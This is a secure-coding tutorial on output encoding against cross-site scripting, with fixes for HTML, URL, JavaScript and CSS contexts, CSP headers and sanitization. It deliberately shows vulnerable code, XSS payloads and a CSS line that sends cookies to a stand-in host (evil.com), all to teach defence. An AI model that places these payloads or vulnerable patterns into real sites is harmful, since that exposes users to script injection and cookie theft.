Output Encoding
Learn context-aware output encoding to prevent XSS, injection attacks, and data leakage.
Output encoding is the counterpart to input validation. While input validation controls what comes into your application, output encoding ensures data is safely rendered in different contexts. The most common vulnerability prevented by proper output encoding is Cross-Site Scripting (XSS).
The Problem: Context Matters
The same data requires different encoding depending on where it's rendered:
<!-- Same user input, different contexts -->
<p>Hello, USER_INPUT</p> <!-- HTML context -->
<a href="/search?q=USER_INPUT">Link</a> <!-- URL context -->
<script>var name = 'USER_INPUT';</script> <!-- JavaScript context -->
<style>body { font: USER_INPUT; }</style> <!-- CSS context -->
Each context has different dangerous characters and requires different encoding.
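As a rough illustration of that point, the sketch below encodes one hostile string for three of these contexts using only the Python standard library. The sample payload and variable names are made up for the example, and replacing `<` with `\u003c` for the script context is one common approach, not the only one.

```python
import html
import json
from urllib.parse import quote

# Illustrative hostile input (not taken from a real request).
payload = "<script>alert('x')</script>&q=1"

# HTML element content: neutralize markup characters.
as_html = html.escape(payload)

# URL query value: percent-encode everything outside the unreserved set.
as_url = quote(payload, safe="")

# JavaScript string literal inside <script>: JSON-encode, then escape "<"
# so the value cannot close the surrounding script element.
as_js = json.dumps(payload).replace("<", "\\u003c")

print(as_html)
print(as_url)
print(as_js)
```

The three results differ even though the input is identical, which is why a single "sanitize" step applied at input time cannot cover every output.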
Cross-Site Scripting (XSS) Types
Reflected XSS
Attack payload is in the request and immediately reflected in the response:
# VULNERABLE
@app.route('/search')
def search():
    query = request.args.get('q', '')
    return f"<h1>Results for: {query}</h1>"  # Attacker: <script>alert('XSS')</script>
Stored XSS
Attack payload is stored in the database and served to other users:
# VULNERABLE
@app.route('/comment', methods=['POST'])
def add_comment():
    comment = request.form['comment']
    db.save_comment(comment)  # Stored in database
    return redirect('/comments')  # Served to all visitors
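A minimal sketch of the usual fix for the stored case, assuming the comment is kept raw and escaped when the page is rendered. The in-memory list and both function names are hypothetical stand-ins for a real database and view.

```python
import html

# Hypothetical in-memory stand-in for the comments table.
stored_comments = []

def add_comment(comment: str) -> None:
    # Store the raw text; encoding happens when it is rendered.
    stored_comments.append(comment)

def render_comments() -> str:
    # Escape every stored value at output time, for the HTML context.
    items = "".join(f"<li>{html.escape(c)}</li>" for c in stored_comments)
    return f"<ul>{items}</ul>"

add_comment("Nice post!")
add_comment("<script>alert('XSS')</script>")
page = render_comments()
print(page)
```

Escaping at render time means the protection does not depend on every write path having cleaned the data first.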
DOM-Based XSS
Vulnerability exists in client-side JavaScript:
// VULNERABLE
const name = new URLSearchParams(window.location.search).get('name');
document.getElementById('greeting').innerHTML = 'Hello, ' + name;
Context-Aware Encoding
HTML Context Encoding
Encode these characters when inserting into HTML element content:
| Character | Encoding |
|---|---|
| `<` | `&lt;` |
| `>` | `&gt;` |
| `&` | `&amp;` |
| `"` | `&quot;` |
| `'` | `&#x27;` |
import html

# SECURE: Using built-in HTML escaping
def safe_html_output(user_input):
    return f"<p>Hello, {html.escape(user_input)}</p>"

# With a template engine (preferred)
# Flask enables Jinja2 auto-escaping for .html templates;
# a bare jinja2.Environment needs autoescape=True
# {{ user_input }} <-- automatically escaped
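To check how the standard library treats the five characters listed above, a small sketch like the following can help. The `mapping` and `escaped` names are illustrative.

```python
import html

# Escape each of the five characters on its own.
mapping = {ch: html.escape(ch) for ch in ['<', '>', '&', '"', "'"]}
for ch, entity in mapping.items():
    print(repr(ch), "->", entity)

# A typical payload becomes inert text once "<" and ">" are encoded.
escaped = html.escape("<img src=x onerror=alert(1)>")
print(escaped)

# With quote=False the quote characters are left alone, which is only
# acceptable for element content, never for attribute values.
unquoted = html.escape('"hi"', quote=False)
```

Note that `html.escape` encodes `&` as well, so text that already contains entities is escaped a second time. That is the correct behaviour for untrusted input.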
HTML Attribute Encoding
Attributes need extra care, especially unquoted ones, where a single space is enough to end the value and start a new attribute:
# DANGEROUS: Unquoted attribute
f'<input value={user_input}>' # Attacker: x onclick=alert(1)
# SAFER: Quoted + escaped
f'<input value="{html.escape(user_input, quote=True)}">'
# SAFEST: Avoid dynamic attributes when possible
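The sketch below shows why escaping alone does not rescue an unquoted attribute, and what quoting plus escaping produces for a quote-based payload. `render_input` is a hypothetical helper written for this example.

```python
import html

def render_input(value: str) -> str:
    # Always quote the attribute, then escape quotes inside the value.
    return f'<input value="{html.escape(value, quote=True)}">'

# This payload contains none of the five special characters, so escaping
# leaves it untouched; in an unquoted attribute the space would still
# start a new onclick attribute.
unquoted_payload = "x onclick=alert(1)"
unchanged = html.escape(unquoted_payload) == unquoted_payload

# A payload that tries to close a quoted attribute is neutralized.
quoted_payload = '" onmouseover="alert(1)'
rendered = render_input(quoted_payload)
print(rendered)
```

In other words, the quotes around the attribute do as much work as the escaping does.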
URL Encoding
When inserting user input into URLs:
import html
from urllib.parse import quote, urlencode, urlparse

# Encoding a single value
def safe_url_param(value):
    return quote(value, safe='')  # Encode all reserved characters, including "/"

# Building a query string
def build_search_url(query, page):
    params = urlencode({'q': query, 'page': page})
    return f"/search?{params}"

# DANGEROUS: User input in href without validation
# Could allow javascript: URLs
f'<a href="{user_input}">Click</a>'  # Attacker: javascript:alert(1)

# SECURE: Validate URL scheme
def safe_link(url):
    # Browsers ignore leading whitespace, so strip it before parsing
    url = url.strip()
    parsed = urlparse(url)
    if parsed.scheme not in ('http', 'https', ''):
        return '#'  # Block dangerous schemes
    return html.escape(url)
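A somewhat stricter variant of the scheme check is sketched below. It assumes links should be either same-site absolute paths or `http`/`https` URLs and rejects everything else, including bare relative paths and protocol-relative `//host` URLs. `is_safe_href`, `render_link`, and `ALLOWED_SCHEMES` are hypothetical names, and the policy itself is an assumption to adapt to the application.

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_href(url: str) -> bool:
    # Browsers drop tabs and newlines inside a URL and ignore leading
    # whitespace, so "java\tscript:" still runs; remove them first.
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    # Same-site absolute path, but not protocol-relative "//host/...".
    if cleaned.startswith("/") and not cleaned.startswith("//"):
        return True
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return False  # Unparseable input is rejected.
    return scheme in ALLOWED_SCHEMES

def render_link(url: str, label: str) -> str:
    # Fall back to "#" for rejected URLs; escape for the attribute context.
    href = html.escape(url, quote=True) if is_safe_href(url) else "#"
    return f'<a href="{href}">{html.escape(label)}</a>'

print(render_link("javascript:alert(1)", "Click"))
print(render_link("/search?q=a&page=2", "Next"))
```

Using an allowlist of schemes avoids having to enumerate every dangerous one (`javascript:`, `data:`, `vbscript:`, and so on).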
JavaScript Context Encoding
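Inserting data into an inline script requires JSON encoding, plus escaping of <, > and & so the value cannot close the surrounding <script> element (json.dumps alone does not do this):
import json

# SECURE: JSON encoding for JavaScript context
@app.route('/page')
def page():
    user_data = {'name': request.args.get('name', '')}
    # json.dumps leaves "<" as-is, so "</script>" in the value would end
    # the script block early; \uXXXX escapes are valid inside JS strings
    safe_json = (json.dumps(user_data)
                 .replace('<', '\\u003c')
                 .replace('>', '\\u003e')
                 .replace('&', '\\u0026'))
    return f'''
    <script>
        const userData = {safe_json};
        console.log(userData.name);
    </script>
    '''

# In Jinja2, use the tojson filter, which also escapes <, >, & and '
# <script>const data = {{ user_data | tojson }};</script>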
Never do this:
# VULNERABLE: String interpolation in JavaScript
f"<script>var name = '{user_input}';</script>" # Attacker: '; alert('XSS'); //
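To see why quoting matters in a script context, the sketch below runs a `</script>` breakout payload through a small helper. `js_literal` is a hypothetical name. It JSON-encodes the value and then rewrites `<`, `>` and `&` as `\uXXXX` escapes, which JavaScript reads back as the original characters.

```python
import json

def js_literal(value) -> str:
    """JSON-encode a value for embedding inside an inline <script> block."""
    encoded = json.dumps(value)
    # json.dumps leaves "<", ">" and "&" untouched, so "</script>" inside
    # the data would end the script element early.
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))

payload = "</script><script>alert('XSS')</script>"

# Plain json.dumps: the payload's own </script> closes the block.
naive = f"<script>const name = {json.dumps(payload)};</script>"

# Escaped: only the template's closing tag remains.
snippet = f"<script>const name = {js_literal(payload)};</script>"

print(naive.count("</script>"))
print(snippet.count("</script>"))
```

The escaped literal still round-trips through `json.loads`, so the script receives exactly the original string.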
CSS Context Encoding
Avoid putting user input in CSS when possible:
# DANGEROUS: User input in CSS
f'<div style="color: {user_input}">'  # Attacker: red; background: url(evil.com/steal?cookie=...)

# SAFER: Validate against allowlist
ALLOWED_COLORS = {'red', 'blue', 'green', 'black', 'white'}

def safe_color(color):
    if color.lower() in ALLOWED_COLORS:
        return color.lower()
    return 'black'  # Default safe value
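If a fixed list of names is too restrictive, one possible extension is to also accept hex colors matched by a strict pattern. This is a sketch under that assumption. `HEX_COLOR` and `safe_css_color` are hypothetical names, and the pattern deliberately covers only the 3- and 6-digit forms.

```python
import re

ALLOWED_COLORS = {"red", "blue", "green", "black", "white"}
# Exactly "#" followed by 3 or 6 hex digits; nothing else may appear.
HEX_COLOR = re.compile(r"#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})")

def safe_css_color(value: str, default: str = "black") -> str:
    candidate = value.strip().lower()
    # fullmatch rejects any trailing text such as "; background: ...".
    if candidate in ALLOWED_COLORS or HEX_COLOR.fullmatch(candidate):
        return candidate
    return default

print(safe_css_color("#FFF"))
print(safe_css_color("red; background: url(evil.com)"))
```

The value is validated as a whole token rather than escaped, because CSS has too many ways to smuggle syntax through partial escaping.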
Framework-Level Protection
Modern frameworks provide automatic encoding:
Python (Flask/Jinja2)
from flask import Flask, render_template
from markupsafe import escape, Markup

app = Flask(__name__)

@app.route('/hello/<name>')
def hello(name):
    # render_template auto-escapes .html templates by default
    return render_template('hello.html', name=name)

# Manual escaping if not using templates (separate illustrative route)
@app.route('/hello-plain/<name>')
def hello_plain(name):
    return f"Hello, {escape(name)}!"

# If you need to render raw HTML (be VERY careful)
trusted_html = Markup('<strong>Safe HTML</strong>')
JavaScript (React)
// React escapes by default
function Greeting({ name }) {
  return <h1>Hello, {name}</h1>; // Safe - auto-escaped
}

// DANGEROUS: dangerouslySetInnerHTML bypasses protection
function RawHtml({ content }) {
  // Only use with sanitized content
  return <div dangerouslySetInnerHTML={{ __html: content }} />;
}
Go
package main

import (
	"html/template"
	"net/http"
)

func handler(w http.ResponseWriter, r *http.Request) {
	name := r.URL.Query().Get("name")
	// html/template auto-escapes based on context
	tmpl := template.Must(template.New("hello").Parse(
		`<h1>Hello, {{.Name}}!</h1>`)) // Safe
	tmpl.Execute(w, struct{ Name string }{name})
}
Content Security Policy (CSP)
CSP is a defense-in-depth mechanism that mitigates XSS even if encoding fails:
# Add CSP header
@app.after_request
def add_security_headers(response):
    response.headers['Content-Security-Policy'] = (
        "default-src 'self'; "
        "script-src 'self'; "
        "style-src 'self' 'unsafe-inline'; "
        "img-src 'self' data: https:; "
        "frame-ancestors 'none';"
    )
    return response
Key CSP directives:
- `default-src 'self'` - Only allow resources from the same origin
- `script-src 'self'` - Only allow scripts from the same origin (blocks inline scripts)
- `frame-ancestors 'none'` - Prevent clickjacking
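Because `script-src 'self'` blocks inline scripts, pages that still need one can allow it with a per-response nonce. The following is a minimal sketch of that idea using the standard library. `build_csp` is a hypothetical helper, and a real application would generate the nonce once per response and pass it to both the header and the template.

```python
import secrets

def build_csp(nonce: str) -> str:
    # Each directive is a separate entry; they are joined with "; ".
    directives = [
        "default-src 'self'",
        f"script-src 'self' 'nonce-{nonce}'",
        "frame-ancestors 'none'",
    ]
    return "; ".join(directives)

# A fresh, unpredictable value for every response.
nonce = secrets.token_urlsafe(16)
header_value = build_csp(nonce)

# Only inline scripts carrying the matching nonce attribute will run.
script_tag = f'<script nonce="{nonce}">console.log("allowed");</script>'

print(header_value)
```

An injected `<script>` without the nonce is refused by the browser, so the policy still helps if an encoding step is missed somewhere.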
HTML Sanitization for Rich Content
When you need to allow some HTML (e.g., rich text editors):
import bleach

ALLOWED_TAGS = ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'a']
ALLOWED_ATTRIBUTES = {'a': ['href', 'title']}

def sanitize_rich_text(html_content):
    """Sanitize user HTML, keeping only safe tags."""
    return bleach.clean(
        html_content,
        tags=ALLOWED_TAGS,
        attributes=ALLOWED_ATTRIBUTES,
        strip=True
    )

# Also validate link URLs
def sanitize_with_link_check(html_content):
    def check_url(tag, name, value):
        if name == 'href':
            # Only allow http/https links and site-relative paths
            return value.startswith(('http://', 'https://', '/'))
        # Allow title only; returning True here would let onclick, style, etc. through
        return name == 'title'
    return bleach.clean(
        html_content,
        tags=ALLOWED_TAGS,
        attributes={'a': check_url},
        strip=True
    )
Key Takeaways
- Context matters - Different contexts require different encoding
- Use framework auto-escaping - Don't disable it without good reason
- Encode on output - Not on input (you don't know the output context at input time)
- Be extra careful with:
  - `innerHTML` / `dangerouslySetInnerHTML`
  - Template `| safe` / `Markup()` / `{!! !!}` filters
  - URL schemes in `href` attributes
  - User input in JavaScript contexts
- Add CSP headers - Defense in depth
- Use sanitization libraries - For rich text, use proven libraries like bleach or DOMPurify
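The "encode on output" point can be made concrete with a short sketch. It assumes a value that is later needed in both an HTML page and a JSON API response, and all variable names are illustrative.

```python
import html
import json

raw_name = "Tom & Jerry <3"

# Encoding at input time bakes HTML entities into the stored value...
stored_encoded = html.escape(raw_name)

# ...which then leak into non-HTML outputs such as a JSON API response,
api_bad = json.dumps({"name": stored_encoded})
# and get double-encoded when a template escapes the value again.
html_bad = html.escape(stored_encoded)

# Storing the raw value and encoding per context avoids both problems.
api_good = json.dumps({"name": raw_name})
html_good = html.escape(raw_name)

print(html_bad)
print(html_good)
```

The "bad" HTML would show a literal `&amp;` to the user, while the "good" one displays the original ampersand.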
Practice Exercise
Identify the XSS vulnerabilities and fix them:
<!-- Template: search_results.html -->
<h1>Search results for: {{ query | safe }}</h1>
<script></script>
<a href="{{ next_url }}">Next Page</a>
{% for result in results %}
<div class="result" style="border-color: {{ result.color }}">
<h2>{{ result.title | safe }}</h2>
<p>{{ result.description }}</p>
</div>
{% endfor %}
Hints:
- `| safe` filter disables escaping - is it needed?
- What if `query` contains a quote?
- What if `next_url` is `javascript:...`?
- What if `result.color` contains malicious CSS?